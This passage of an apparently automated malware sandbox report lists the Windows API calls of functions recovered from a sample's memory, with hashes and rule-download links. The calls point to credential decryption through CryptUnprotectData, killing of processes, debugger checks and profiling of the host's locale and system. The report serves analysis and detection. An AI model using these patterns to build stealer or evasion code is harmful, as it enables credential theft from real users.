lstrcatA.KERNEL32(?,?), ref: 004098CD
lstrcatA.KERNEL32(?,00435128), ref: 004098DD
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
lstrcpy.KERNEL32(00000000,?), ref: 00409950
StrStrA.SHLWAPI(?,00A0E8C0), ref: 00409965
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
lstrlenA.KERNEL32(?), ref: 00409996
wsprintfA.USER32 ref: 004099A6
lstrcpy.KERNEL32(?,?), ref: 004099BD
memset.MSVCRT ref: 004099D3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 00409A32
Sleep.KERNEL32(00001388), ref: 00409A41
CloseDesktop.USER32(?), ref: 00409A81

Strings

%s%s, xrefs: 004099A0
D, xrefs: 004099EA

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
String ID: %s%s$D
API String ID: 3850938096-433275411
Opcode ID: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
Instruction ID: a7c648236efd38c04947cc9f358bb87a81258cd583e53001e760b02128fb778b
Opcode Fuzzy Hash: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
Instruction Fuzzy Hash: 606173B1204340AFD720EF64DC45F9B77E9AF88704F00492EF649972E1DBB49904CBA6

Function 02471820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471880
lstrcpy.KERNEL32(00000000,00000000), ref: 024718D3
lstrcat.KERNEL32(00000000), ref: 024718DD
lstrcpy.KERNEL32(00000000,00000000), ref: 02471909
lstrcpy.KERNEL32(00000000,?), ref: 02471A5A
lstrcat.KERNEL32(00000000,00000000), ref: 02471A65

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction ID: 7e2b7ac3f440551a41734e3c340a8c8f6b610661a24696af02e48bea941602de
Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction Fuzzy Hash: 41815271900656DBDB21EFB9CC84AEE7BB6AF44309F04012AEC29A7251DB74DD01DFA0

Function 004246C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
Process32First.KERNEL32(00000000,00000128), ref: 004246E9
Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
StrCmpCA.SHLWAPI(?,?), ref: 0042470D
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
CloseHandle.KERNEL32(00000000), ref: 00424738
Process32Next.KERNEL32(00000000,00000128), ref: 00424746
CloseHandle.KERNEL32(00000000), ref: 00424751

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4

Function 02492F67 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02497477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02497495

GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02492FA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 02492FB4
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02492FC1
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02492FF3
LocalFree.KERNEL32(00000000), ref: 024931D1

Strings

/ , xrefs: 02493006

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction ID: 74559ffaa9ef80319cb974013e8fad3ed6b1bcbd94419037a6bab134727641ca
Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction Fuzzy Hash: 18B1C771900205CFDB15CF54C948B95BBB2BB85329F29C1EAD409AB3B5D7769C82CF90

Function 0247EFF7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0247F022
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0247F03D
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0247F045
memcpy.MSVCRT(?,?,?), ref: 0247F0B8
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0247F0EE
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0247F110

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction ID: 22628b09a24507406c6e4512747ffebf2f1afc930c3d98aa72dd72e195febe7b
Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction Fuzzy Hash: 0E31C175B00229ABDB109B98EC45BEFB779EF44705F04417AFA09E3240DBB49A04CBE5

Function 02492E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02492E49
RtlAllocateHeap.NTDLL(00000000), ref: 02492E50
GetTimeZoneInformation.KERNEL32(?), ref: 02492E5F
wsprintfA.USER32 ref: 02492E8A

Strings

wwww, xrefs: 02492E70

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction ID: e9c62a63f3c2ca32bbc0564ce27a459f27b75b7565f9db03803b4b3e3c101b61
Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction Fuzzy Hash: 9401F771A04614ABCB188F58DC4AB6ABB6EE784720F10432AFD16D73C0D7B419008AE5

Function 02497E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02498699
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 024986AE
UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 024986B9
GetCurrentProcess.KERNEL32(C0000409), ref: 024986D5
TerminateProcess.KERNEL32(00000000), ref: 024986DC

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction ID: 17e4920f2f4915ccd9c00a34b7a2c3c2990c17fa8da9d0d0681629aaa342014c
Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction Fuzzy Hash: 2C21F0B59103069FCB60DF15F984A49BBB4FB28304F50603EF51887B61EBB069858F5D

Function 00407690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
HeapAlloc.KERNEL32(00000000), ref: 004076A5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
LocalFree.KERNEL32(?), ref: 004076F7

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4

Function 00424090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocProcess
String ID:
API String ID: 3939037734-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4

Function 024942F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 02494314
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 02494323
RtlAllocateHeap.NTDLL(00000000), ref: 0249432A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 0249435A

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: 058fe40762a17df480516b8e175251de1deb25d74b7a33d0f20afe0ee27dbd4c
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: AA011A70600205ABDB249FA5EC89BABBBADEF85315F104159BD0987340DBB1E9418BA0

Function 00409BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
memcpy.MSVCRT(00000000,?), ref: 00409C2A
LocalFree.KERNEL32(?), ref: 00409C37

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4

Function 02479E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02479E66
LocalAlloc.KERNEL32(00000040,?), ref: 02479E7A
memcpy.MSVCRT(00000000,?), ref: 02479E91
LocalFree.KERNEL32(?), ref: 02479E9E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: 0e71142eea7e60c10469a1b78ce3e8aa22993320c20d6bc7a98a8d70d4a2832e
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: 2F011D75A41305AFD7109BA4DC55FAFB779EB44700F104559FA04AB380DBB09A00CBE5

Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4

Function 0248CE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0248CE6D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0248CEAD
lstrcpyn.KERNEL32(?,?,00000104), ref: 0248CF30

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction ID: 0a4190df63ec576170daaf79269db817d0bda6086746edc0c3bbc175a5d66644
Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction Fuzzy Hash: DA315271A50615BFD714DB98CC81FAAB7B9AB88B14F504185FB04EB2D0D7B0AE45CBE0

Function 024933F7 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 02493426
wsprintfA.USER32 ref: 0249343C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5

Function 02499A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 02499AA7
free.MSVCRT ref: 02499AAF
free.MSVCRT ref: 02499AB7
free.MSVCRT ref: 02499ABF
free.MSVCRT ref: 02499AC7
free.MSVCRT ref: 02499ACF
free.MSVCRT ref: 02499AD6
free.MSVCRT ref: 02499ADE
free.MSVCRT ref: 02499AE6
free.MSVCRT ref: 02499AEE
free.MSVCRT ref: 02499AF6
free.MSVCRT ref: 02499AFE
free.MSVCRT ref: 02499B06
free.MSVCRT ref: 02499B0E
free.MSVCRT ref: 02499B16
free.MSVCRT ref: 02499B1E
free.MSVCRT ref: 02499B29
free.MSVCRT ref: 02499B31
free.MSVCRT ref: 02499B39
free.MSVCRT ref: 02499B41
free.MSVCRT ref: 02499B49
free.MSVCRT ref: 02499B51
free.MSVCRT ref: 02499B59
free.MSVCRT ref: 02499B61
free.MSVCRT ref: 02499B69
free.MSVCRT ref: 02499B71
free.MSVCRT ref: 02499B79
free.MSVCRT ref: 02499B81
free.MSVCRT ref: 02499B89
free.MSVCRT ref: 02499B91
free.MSVCRT ref: 02499B99
free.MSVCRT ref: 02499BA1
free.MSVCRT ref: 02499BAF
free.MSVCRT ref: 02499BBA
free.MSVCRT ref: 02499BC5
free.MSVCRT ref: 02499BD0
free.MSVCRT ref: 02499BDB
free.MSVCRT ref: 02499BE6
free.MSVCRT ref: 02499BF1
free.MSVCRT ref: 02499BFC
free.MSVCRT ref: 02499C07
free.MSVCRT ref: 02499C12
free.MSVCRT ref: 02499C1D
free.MSVCRT ref: 02499C28
free.MSVCRT ref: 02499C33
free.MSVCRT ref: 02499C3E
free.MSVCRT ref: 02499C49
free.MSVCRT ref: 02499C54
free.MSVCRT ref: 02499C62
free.MSVCRT ref: 02499C6D
free.MSVCRT ref: 02499C78
free.MSVCRT ref: 02499C83
free.MSVCRT ref: 02499C8E
free.MSVCRT ref: 02499C99
free.MSVCRT ref: 02499CA4
free.MSVCRT ref: 02499CAF
free.MSVCRT ref: 02499CBA
free.MSVCRT ref: 02499CC5
free.MSVCRT ref: 02499CD0
free.MSVCRT ref: 02499CDB
free.MSVCRT ref: 02499CE6
free.MSVCRT ref: 02499CF1
free.MSVCRT ref: 02499CFC
free.MSVCRT ref: 02499D07
free.MSVCRT ref: 02499D15
free.MSVCRT ref: 02499D20
free.MSVCRT ref: 02499D2B
free.MSVCRT ref: 02499D36
free.MSVCRT ref: 02499D41
free.MSVCRT ref: 02499D4C
free.MSVCRT ref: 02499D57
free.MSVCRT ref: 02499D62
free.MSVCRT ref: 02499D6D
free.MSVCRT ref: 02499D78
free.MSVCRT ref: 02499D83
free.MSVCRT ref: 02499D8E
free.MSVCRT ref: 02499D99
free.MSVCRT ref: 02499DA4
free.MSVCRT ref: 02499DAF
free.MSVCRT ref: 02499DBA
free.MSVCRT ref: 02499DC8
free.MSVCRT ref: 02499DD3
free.MSVCRT ref: 02499DDE
free.MSVCRT ref: 02499DE9
free.MSVCRT ref: 02499DF4
free.MSVCRT ref: 02499DFF

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
